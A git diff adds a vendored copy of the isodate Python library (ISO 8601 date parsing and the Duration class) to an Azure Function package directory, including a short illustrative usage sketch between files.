--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate-0.6.1.dist-info/top_level.txt
@@ -0,0 +1 @@
+isodate
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__init__.py
new file mode 100644
index 0000000..4b63cc4
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__init__.py
@@ -0,0 +1,72 @@
+##############################################################################
+# Copyright 2009, Gerhard Weis
+# All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
+#
+# * Redistributions of source code must retain the above copyright notice,
+#   this list of conditions and the following disclaimer.
+# * Redistributions in binary form must reproduce the above copyright notice,
+#   this list of conditions and the following disclaimer in the documentation
+#   and/or other materials provided with the distribution.
+# * Neither the name of the authors nor the names of its contributors
+#   may be used to endorse or promote products derived from this software
+#   without specific prior written permission.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT
+##############################################################################
+'''
+Import all essential functions and constants to re-export them here for easy
+access.
+
+This module also contains various pre-defined ISO 8601 format strings.
+''' +from isodate.isodates import parse_date, date_isoformat +from isodate.isotime import parse_time, time_isoformat +from isodate.isodatetime import parse_datetime, datetime_isoformat +from isodate.isoduration import parse_duration, duration_isoformat +from isodate.isoerror import ISO8601Error +from isodate.isotzinfo import parse_tzinfo, tz_isoformat +from isodate.tzinfo import UTC, FixedOffset, LOCAL +from isodate.duration import Duration +from isodate.isostrf import strftime +from isodate.isostrf import DATE_BAS_COMPLETE, DATE_BAS_ORD_COMPLETE +from isodate.isostrf import DATE_BAS_WEEK, DATE_BAS_WEEK_COMPLETE +from isodate.isostrf import DATE_CENTURY, DATE_EXT_COMPLETE +from isodate.isostrf import DATE_EXT_ORD_COMPLETE, DATE_EXT_WEEK +from isodate.isostrf import DATE_EXT_WEEK_COMPLETE, DATE_YEAR +from isodate.isostrf import DATE_BAS_MONTH, DATE_EXT_MONTH +from isodate.isostrf import TIME_BAS_COMPLETE, TIME_BAS_MINUTE +from isodate.isostrf import TIME_EXT_COMPLETE, TIME_EXT_MINUTE +from isodate.isostrf import TIME_HOUR +from isodate.isostrf import TZ_BAS, TZ_EXT, TZ_HOUR +from isodate.isostrf import DT_BAS_COMPLETE, DT_EXT_COMPLETE +from isodate.isostrf import DT_BAS_ORD_COMPLETE, DT_EXT_ORD_COMPLETE +from isodate.isostrf import DT_BAS_WEEK_COMPLETE, DT_EXT_WEEK_COMPLETE +from isodate.isostrf import D_DEFAULT, D_WEEK, D_ALT_EXT, D_ALT_BAS +from isodate.isostrf import D_ALT_BAS_ORD, D_ALT_EXT_ORD + +__all__ = ['parse_date', 'date_isoformat', 'parse_time', 'time_isoformat', + 'parse_datetime', 'datetime_isoformat', 'parse_duration', + 'duration_isoformat', 'ISO8601Error', 'parse_tzinfo', + 'tz_isoformat', 'UTC', 'FixedOffset', 'LOCAL', 'Duration', + 'strftime', 'DATE_BAS_COMPLETE', 'DATE_BAS_ORD_COMPLETE', + 'DATE_BAS_WEEK', 'DATE_BAS_WEEK_COMPLETE', 'DATE_CENTURY', + 'DATE_EXT_COMPLETE', 'DATE_EXT_ORD_COMPLETE', 'DATE_EXT_WEEK', + 'DATE_EXT_WEEK_COMPLETE', 'DATE_YEAR', + 'DATE_BAS_MONTH', 'DATE_EXT_MONTH', + 'TIME_BAS_COMPLETE', 'TIME_BAS_MINUTE', 'TIME_EXT_COMPLETE', + 'TIME_EXT_MINUTE', 'TIME_HOUR', 'TZ_BAS', 'TZ_EXT', 'TZ_HOUR', + 'DT_BAS_COMPLETE', 'DT_EXT_COMPLETE', 'DT_BAS_ORD_COMPLETE', + 'DT_EXT_ORD_COMPLETE', 'DT_BAS_WEEK_COMPLETE', + 'DT_EXT_WEEK_COMPLETE', 'D_DEFAULT', 'D_WEEK', 'D_ALT_EXT', + 'D_ALT_BAS', 'D_ALT_BAS_ORD', 'D_ALT_EXT_ORD'] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..b0f6a36 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/duration.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/duration.cpython-39.pyc new file mode 100644 index 0000000..71337a4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/duration.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isodates.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isodates.cpython-39.pyc new file mode 100644 index 0000000..05c90c9 
Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isodates.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isodatetime.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isodatetime.cpython-39.pyc new file mode 100644 index 0000000..310dd1b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isodatetime.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isoduration.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isoduration.cpython-39.pyc new file mode 100644 index 0000000..4f4c5fe Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isoduration.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isoerror.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isoerror.cpython-39.pyc new file mode 100644 index 0000000..0f325f4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isoerror.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isostrf.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isostrf.cpython-39.pyc new file mode 100644 index 0000000..bbbd599 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isostrf.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isotime.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isotime.cpython-39.pyc new file mode 100644 index 0000000..4791f70 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isotime.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isotzinfo.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isotzinfo.cpython-39.pyc new file mode 100644 index 0000000..e54118c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/isotzinfo.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/tzinfo.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/tzinfo.cpython-39.pyc new file mode 100644 index 0000000..222a06e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/__pycache__/tzinfo.cpython-39.pyc differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/duration.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/duration.py
new file mode 100644
index 0000000..0a556c7
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/duration.py
@@ -0,0 +1,325 @@
+##############################################################################
+# Copyright 2009, Gerhard Weis
+# All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
+#
+# * Redistributions of source code must retain the above copyright notice,
+#   this list of conditions and the following disclaimer.
+# * Redistributions in binary form must reproduce the above copyright notice,
+#   this list of conditions and the following disclaimer in the documentation
+#   and/or other materials provided with the distribution.
+# * Neither the name of the authors nor the names of its contributors
+#   may be used to endorse or promote products derived from this software
+#   without specific prior written permission.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT
+##############################################################################
+'''
+This module defines a Duration class.
+
+The Duration class allows defining durations in years and months and can be
+used as a limited replacement for timedelta objects.
+'''
+from datetime import timedelta
+from decimal import Decimal, ROUND_FLOOR
+
+
+def fquotmod(val, low, high):
+    '''
+    A divmod function with boundaries.
+    '''
+    # assumes that all the maths is done with Decimals.
+    # divmod for Decimal uses truncation instead of floor, unlike the
+    # builtin divmod, so we have to do it manually here.
+    a, b = val - low, high - low
+    div = (a / b).to_integral(ROUND_FLOOR)
+    mod = a - div * b
+    # if we were not using Decimal, it would look like this:
+    # div, mod = divmod(val - low, high - low)
+    mod += low
+    return int(div), mod
+
+
+def max_days_in_month(year, month):
+    '''
+    Determines the number of days of a specific month in a specific year.
+    '''
+    if month in (1, 3, 5, 7, 8, 10, 12):
+        return 31
+    if month in (4, 6, 9, 11):
+        return 30
+    if ((year % 400) == 0) or ((year % 100) != 0) and ((year % 4) == 0):
+        return 29
+    return 28
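+
+
+# Illustrative note (not part of the upstream source): fquotmod is a floored
+# divmod over the half-open interval [low, high), which is what lets the
+# month arithmetic below carry into years; max_days_in_month then clamps the
+# day of month afterwards. For example:
+#
+#     fquotmod(Decimal(14), 1, 13)  # -> (1, Decimal('2')): month 14 = +1 year, February
+#     fquotmod(Decimal(0), 1, 13)   # -> (-1, Decimal('12')): month 0 = -1 year, December
+#     max_days_in_month(2012, 2)    # -> 29 (leap year)
+#     max_days_in_month(2011, 2)    # -> 28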
+
+
+class Duration(object):
+    '''
+    A class which represents a duration.
+
+    The difference to datetime.timedelta is that this class also handles
+    differences given in years and months.
+    A Duration treats differences given in years and months separately from
+    all other components.
+
+    A Duration can be used almost like any timedelta object, however there
+    are some restrictions:
+      * It is not really possible to compare Durations, because it is
+        unclear whether a duration of 1 year is bigger than 365 days or not.
+      * Equality is only tested between the two (year, month vs. timedelta)
+        basic components.
+
+    A Duration can also be converted into a datetime object, but this
+    requires a start date or an end date.
+
+    The algorithm to add a duration to a date is defined at
+    http://www.w3.org/TR/xmlschema-2/#adding-durations-to-dateTimes
+    '''
+
+    def __init__(self, days=0, seconds=0, microseconds=0, milliseconds=0,
+                 minutes=0, hours=0, weeks=0, months=0, years=0):
+        '''
+        Initialise this Duration instance with the given parameters.
+        '''
+        if not isinstance(months, Decimal):
+            months = Decimal(str(months))
+        if not isinstance(years, Decimal):
+            years = Decimal(str(years))
+        self.months = months
+        self.years = years
+        self.tdelta = timedelta(days, seconds, microseconds, milliseconds,
+                                minutes, hours, weeks)
+
+    def __getstate__(self):
+        return self.__dict__
+
+    def __setstate__(self, state):
+        self.__dict__.update(state)
+
+    def __getattr__(self, name):
+        '''
+        Provide direct access to attributes of the included timedelta
+        instance.
+        '''
+        return getattr(self.tdelta, name)
+
+    def __str__(self):
+        '''
+        Return a string representation of this duration similar to timedelta.
+        '''
+        params = []
+        if self.years:
+            params.append('%d years' % self.years)
+        if self.months:
+            fmt = "%d months"
+            if self.months <= 1:
+                fmt = "%d month"
+            params.append(fmt % self.months)
+        params.append(str(self.tdelta))
+        return ', '.join(params)
+
+    def __repr__(self):
+        '''
+        Return a string suitable for repr(x) calls.
+        '''
+        return "%s.%s(%d, %d, %d, years=%d, months=%d)" % (
+            self.__class__.__module__, self.__class__.__name__,
+            self.tdelta.days, self.tdelta.seconds,
+            self.tdelta.microseconds, self.years, self.months)
+
+    def __hash__(self):
+        '''
+        Return a hash of this instance so that it can be used in, for
+        example, dicts and sets.
+        '''
+        return hash((self.tdelta, self.months, self.years))
+
+    def __neg__(self):
+        """
+        A simple unary minus.
+
+        Returns a new Duration instance with all its components negated.
+        """
+        negduration = Duration(years=-self.years, months=-self.months)
+        negduration.tdelta = -self.tdelta
+        return negduration
+
+    def __add__(self, other):
+        '''
+        Durations can be added with Duration, timedelta, date and datetime
+        objects.
+        '''
+        if isinstance(other, Duration):
+            newduration = Duration(years=self.years + other.years,
+                                   months=self.months + other.months)
+            newduration.tdelta = self.tdelta + other.tdelta
+            return newduration
+        try:
+            # try anything that looks like a date or datetime:
+            # 'other' has attributes year, month, day,
+            # and relies on 'timedelta + other' being implemented
+            if (not(float(self.years).is_integer() and
+                    float(self.months).is_integer())):
+                raise ValueError('fractional years or months not supported'
+                                 ' for date calculations')
+            newmonth = other.month + self.months
+            carry, newmonth = fquotmod(newmonth, 1, 13)
+            newyear = other.year + self.years + carry
+            maxdays = max_days_in_month(newyear, newmonth)
+            if other.day > maxdays:
+                newday = maxdays
+            else:
+                newday = other.day
+            newdt = other.replace(
+                year=int(newyear), month=int(newmonth), day=int(newday)
+            )
+            # does a timedelta + date/datetime
+            return self.tdelta + newdt
+        except AttributeError:
+            # other probably was not a date/datetime compatible object
+            pass
+        try:
+            # try if other is a timedelta;
+            # relies on timedelta + timedelta being supported
+            newduration = Duration(years=self.years, months=self.months)
+            newduration.tdelta = self.tdelta + other
+            return newduration
+        except AttributeError:
+            # ignore ... other probably was not a timedelta compatible object
+            pass
+        # we have tried everything ... return NotImplemented
+        return NotImplemented
+
+    __radd__ = __add__
+
+    def __mul__(self, other):
+        if isinstance(other, int):
+            newduration = Duration(
+                years=self.years * other,
+                months=self.months * other)
+            newduration.tdelta = self.tdelta * other
+            return newduration
+        return NotImplemented
+
+    __rmul__ = __mul__
+
+    def __sub__(self, other):
+        '''
+        It is possible to subtract Duration and timedelta objects from
+        Duration objects.
+        '''
+        if isinstance(other, Duration):
+            newduration = Duration(years=self.years - other.years,
+                                   months=self.months - other.months)
+            newduration.tdelta = self.tdelta - other.tdelta
+            return newduration
+        try:
+            # do maths with our timedelta object ...
+            newduration = Duration(years=self.years, months=self.months)
+            newduration.tdelta = self.tdelta - other
+            return newduration
+        except TypeError:
+            # looks like timedelta - other is not implemented
+            pass
+        return NotImplemented
+
+    def __rsub__(self, other):
+        '''
+        It is possible to subtract Duration objects from date, datetime and
+        timedelta objects.
+
+        TODO: there is some weird behaviour in date - timedelta ...
+              if timedelta has seconds or microseconds set, then
+              date - timedelta != date + (-timedelta)
+              for now we follow this behaviour to avoid surprises when mixing
+              timedeltas with Durations, but in case this ever changes in
+              the stdlib we can just do:
+              return -self + other
+              instead of all the current code
+        '''
+        if isinstance(other, timedelta):
+            tmpdur = Duration()
+            tmpdur.tdelta = other
+            return tmpdur - self
+        try:
+            # check if other behaves like a date/datetime object
+            # (does it have year, month, day and replace?)
+            if (not(float(self.years).is_integer() and
+                    float(self.months).is_integer())):
+                raise ValueError('fractional years or months not supported'
+                                 ' for date calculations')
+            newmonth = other.month - self.months
+            carry, newmonth = fquotmod(newmonth, 1, 13)
+            newyear = other.year - self.years + carry
+            maxdays = max_days_in_month(newyear, newmonth)
+            if other.day > maxdays:
+                newday = maxdays
+            else:
+                newday = other.day
+            newdt = other.replace(
+                year=int(newyear), month=int(newmonth), day=int(newday)
+            )
+            return newdt - self.tdelta
+        except AttributeError:
+            # other probably was not compatible with date/datetime
+            pass
+        return NotImplemented
+
+    def __eq__(self, other):
+        '''
+        If the years/months part and the timedelta part are both equal, then
+        the two Durations are considered equal.
+        '''
+        if isinstance(other, Duration):
+            if (((self.years * 12 + self.months) ==
+                 (other.years * 12 + other.months) and
+                 self.tdelta == other.tdelta)):
+                return True
+            return False
+        # check if other can be compared against a timedelta object;
+        # will raise an AssertionError when optimisation is off
+        if self.years == 0 and self.months == 0:
+            return self.tdelta == other
+        return False
+
+    def __ne__(self, other):
+        '''
+        If the years/months part or the timedelta part is not equal, then
+        the two Durations are considered not equal.
+        '''
+        if isinstance(other, Duration):
+            if (((self.years * 12 + self.months) !=
+                 (other.years * 12 + other.months) or
+                 self.tdelta != other.tdelta)):
+                return True
+            return False
+        # check if other can be compared against a timedelta object;
+        # will raise an AssertionError when optimisation is off
+        if self.years == 0 and self.months == 0:
+            return self.tdelta != other
+        return True
+
+    def totimedelta(self, start=None, end=None):
+        '''
+        Convert this duration into a timedelta object.
+
+        This method requires a start datetime or an end datetime, but raises
+        an exception if both are given.
+        '''
+        if start is None and end is None:
+            raise ValueError("start or end required")
+        if start is not None and end is not None:
+            raise ValueError("only start or end allowed")
+        if start is not None:
+            return (start + self) - start
+        return end - (end - self)
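
A short sketch of how the Duration class behaves in practice (added for
illustration; the commented results follow from the month-carry and
day-clamping logic in __add__ and from totimedelta above)::

    from datetime import date
    from isodate.duration import Duration

    # month arithmetic carries into years and clamps the day of month
    date(2012, 1, 31) + Duration(months=1)   # date(2012, 2, 29) (clamped)
    date(2011, 12, 15) + Duration(months=2)  # date(2012, 2, 15) (year carry)

    # anchoring at a start date converts a Duration to a plain timedelta
    Duration(years=1).totimedelta(start=date(2011, 1, 1))  # timedelta(365)
    Duration(years=1).totimedelta(start=date(2012, 1, 1))  # timedelta(366)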
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isodates.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isodates.py
new file mode 100644
index 0000000..5bf4f2f
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isodates.py
@@ -0,0 +1,213 @@
+##############################################################################
+# Copyright 2009, Gerhard Weis
+# All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
+#
+# * Redistributions of source code must retain the above copyright notice,
+#   this list of conditions and the following disclaimer.
+# * Redistributions in binary form must reproduce the above copyright notice,
+#   this list of conditions and the following disclaimer in the documentation
+#   and/or other materials provided with the distribution.
+# * Neither the name of the authors nor the names of its contributors
+#   may be used to endorse or promote products derived from this software
+#   without specific prior written permission.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT
+##############################################################################
+'''
+This module provides a method to parse an ISO 8601:2004 date string to a
+python datetime.date instance.
+
+It supports all basic, extended and expanded formats as described in the ISO
+standard. The only limitations it has are given by the Python datetime.date
+implementation, which does not support dates before 0001-01-01.
+'''
+import re
+from datetime import date, timedelta
+
+from isodate.isostrf import strftime, DATE_EXT_COMPLETE
+from isodate.isoerror import ISO8601Error
+
+DATE_REGEX_CACHE = {}
+# A dictionary to cache pre-compiled regular expressions.
+# A set of regular expressions is identified by the number of year digits
+# allowed and whether a plus/minus sign is required or not. (This option is
+# changeable only for 4 digit years.)
+
+
+def build_date_regexps(yeardigits=4, expanded=False):
+    '''
+    Compile a set of regular expressions to parse ISO dates. The expressions
+    will be created only if they are not already in DATE_REGEX_CACHE.
+
+    It is necessary to fix the number of year digits, else it is not possible
+    to automatically distinguish between various ISO date formats.
+
+    ISO 8601 allows more than 4 digit years, on prior agreement, but then a
+    +/- sign is required (expanded format). To support the +/- sign for
+    4 digit years, the expanded parameter needs to be set to True.
+    '''
+    if yeardigits != 4:
+        expanded = True
+    if (yeardigits, expanded) not in DATE_REGEX_CACHE:
+        cache_entry = []
+        # ISO 8601 expanded DATE formats allow an arbitrary number of year
+        # digits with a leading +/- sign.
+        if expanded:
+            sign = 1
+        else:
+            sign = 0
+        # 1. complete dates:
+        #    YYYY-MM-DD or +-YYYYYY-MM-DD ... extended date format
+        cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
+                                      r"-(?P<month>[0-9]{2})-(?P<day>[0-9]{2})"
+                                      % (sign, yeardigits)))
+        #    YYYYMMDD or +-YYYYYYMMDD ... basic date format
+        cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
+                                      r"(?P<month>[0-9]{2})(?P<day>[0-9]{2})"
+                                      % (sign, yeardigits)))
+        # 2. complete week dates:
+        #    YYYY-Www-D or +-YYYYYY-Www-D ... extended week date
+        cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
+                                      r"-W(?P<week>[0-9]{2})-(?P<day>[0-9]{1})"
+                                      % (sign, yeardigits)))
+        #    YYYYWwwD or +-YYYYYYWwwD ... basic week date
+        cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})W"
+                                      r"(?P<week>[0-9]{2})(?P<day>[0-9]{1})"
+                                      % (sign, yeardigits)))
+        # 3. ordinal dates:
+        #    YYYY-DDD or +-YYYYYY-DDD ... extended format
+        cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
+                                      r"-(?P<day>[0-9]{3})"
+                                      % (sign, yeardigits)))
+        #    YYYYDDD or +-YYYYYYDDD ... basic format
+        cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
+                                      r"(?P<day>[0-9]{3})"
+                                      % (sign, yeardigits)))
+        # 4. week dates:
+        #    YYYY-Www or +-YYYYYY-Www ... extended reduced accuracy week date
+        cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
+                                      r"-W(?P<week>[0-9]{2})"
+                                      % (sign, yeardigits)))
+        #    YYYYWww or +-YYYYYYWww ... basic reduced accuracy week date
+        cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})W"
+                                      r"(?P<week>[0-9]{2})"
+                                      % (sign, yeardigits)))
+        # 5. month dates:
+        #    YYYY-MM or +-YYYYYY-MM ... reduced accuracy specific month
+        cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
+                                      r"-(?P<month>[0-9]{2})"
+                                      % (sign, yeardigits)))
+        #    YYYYMM or +-YYYYYYMM ... basic incomplete month date format
+        cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
+                                      r"(?P<month>[0-9]{2})"
+                                      % (sign, yeardigits)))
+        # 6. year dates:
+        #    YYYY or +-YYYYYY ... reduced accuracy specific year
+        cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
+                                      % (sign, yeardigits)))
+        # 7. century dates:
+        #    YY or +-YYYY ... reduced accuracy specific century
+        cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}"
+                                      r"(?P<century>[0-9]{%d})"
+                                      % (sign, yeardigits - 2)))
+
+        DATE_REGEX_CACHE[(yeardigits, expanded)] = cache_entry
+    return DATE_REGEX_CACHE[(yeardigits, expanded)]
+
+
+def parse_date(
+        datestring,
+        yeardigits=4, expanded=False, defaultmonth=1, defaultday=1):
+    '''
+    Parse an ISO 8601 date string into a datetime.date object.
+
+    As the datetime.date implementation is limited to dates starting from
+    0001-01-01, negative dates (BC) and year 0 can not be parsed by this
+    method.
+
+    For incomplete dates, this method chooses the first day for it.
For + instance if only a century is given, this method returns the 1st of + January in year 1 of this century. + + supported formats: (expanded formats are shown with 6 digits for year) + YYYYMMDD +-YYYYYYMMDD basic complete date + YYYY-MM-DD +-YYYYYY-MM-DD extended complete date + YYYYWwwD +-YYYYYYWwwD basic complete week date + YYYY-Www-D +-YYYYYY-Www-D extended complete week date + YYYYDDD +-YYYYYYDDD basic ordinal date + YYYY-DDD +-YYYYYY-DDD extended ordinal date + YYYYWww +-YYYYYYWww basic incomplete week date + YYYY-Www +-YYYYYY-Www extended incomplete week date + YYYMM +-YYYYYYMM basic incomplete month date + YYY-MM +-YYYYYY-MM incomplete month date + YYYY +-YYYYYY incomplete year date + YY +-YYYY incomplete century date + + @param datestring: the ISO date string to parse + @param yeardigits: how many digits are used to represent a year + @param expanded: if True then +/- signs are allowed. This parameter + is forced to True, if yeardigits != 4 + + @return: a datetime.date instance represented by datestring + @raise ISO8601Error: if this function can not parse the datestring + @raise ValueError: if datestring can not be represented by datetime.date + ''' + if yeardigits != 4: + expanded = True + isodates = build_date_regexps(yeardigits, expanded) + for pattern in isodates: + match = pattern.match(datestring) + if match: + groups = match.groupdict() + # sign, century, year, month, week, day, + # FIXME: negative dates not possible with python standard types + sign = (groups['sign'] == '-' and -1) or 1 + if 'century' in groups: + return date( + sign * (int(groups['century']) * 100 + 1), + defaultmonth, defaultday) + if 'month' not in groups: # weekdate or ordinal date + ret = date(sign * int(groups['year']), 1, 1) + if 'week' in groups: + isotuple = ret.isocalendar() + if 'day' in groups: + days = int(groups['day'] or 1) + else: + days = 1 + # if first week in year, do weeks-1 + return ret + timedelta(weeks=int(groups['week']) - + (((isotuple[1] == 1) and 1) or 0), + days=-isotuple[2] + days) + elif 'day' in groups: # ordinal date + return ret + timedelta(days=int(groups['day']) - 1) + else: # year date + return ret.replace(month=defaultmonth, day=defaultday) + # year-, month-, or complete date + if 'day' not in groups or groups['day'] is None: + day = defaultday + else: + day = int(groups['day']) + return date(sign * int(groups['year']), + int(groups['month']) or defaultmonth, day) + raise ISO8601Error('Unrecognised ISO 8601 date format: %r' % datestring) + + +def date_isoformat(tdate, format=DATE_EXT_COMPLETE, yeardigits=4): + ''' + Format date strings. + + This method is just a wrapper around isodate.isostrf.strftime and uses + Date-Extended-Complete as default format. + ''' + return strftime(tdate, format, yeardigits) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isodatetime.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isodatetime.py new file mode 100644 index 0000000..03289e7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/isodatetime.py @@ -0,0 +1,68 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. 
